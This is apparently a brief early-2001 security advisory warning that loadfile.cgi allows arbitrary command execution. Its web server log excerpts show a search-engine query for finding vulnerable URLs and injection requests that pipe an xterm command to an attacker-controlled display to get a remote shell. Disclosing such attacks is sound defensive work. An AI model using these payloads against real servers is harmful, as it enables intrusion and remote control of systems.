Headline

Exploitable CGI - loadfile.cgi

Whitehats.ca has seen reflections of loadfile.cgi being used to execute arbitrary commands on webservers. If your using this CGI it is highly recommended that the code be audited to confirm it has appropriate error checking in place.

The SANS institute "consensus" based SANS/FBI Top 20 List currently places CGI vulnerabilities in the #7 position of top vulnerabilities.

In the following example, the attacker successfully passed commands to a Netscape Enterprise Web Server to upload a file and return a remote shell.

aaa.bbb.ccc.ddd - - [22/Jan/2001:05:56:16 -0700] "GET /cgi-progs/loadfile.cgi?file=service_voluntr.htm HTTP/1.0" 200 24813 "http://www.google.com/search?q=allinurl%3A+%22.cgi%3FFILE%3D%22&num=100&hl=en&lr=&safe=off&btnG=Google+Search" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
aaa.bbb.ccc.ddd - - [24/Jan/2001:06:03:22 -0700] "GET /cgi-progs/loadfile.cgi?file=|"/usr/openwin/bin/xterm"%20-ut%20-display%20bad.guy.ip.addr:0| HTTP/1.0" 200 20390 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
aaa.bbb.ccc.ddd - - [08/Feb/2001:02:39:42 -0700] "GET /cgi-progs/loadfile.cgi?file=|"/usr/openwin/bin/xterm"%20-ut%20-bg%20red%20-display%20bad.guy2.ip.addr:0| HTTP/1.0" 200 246 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

Contact Information -- info@whitehats.ca

Credits: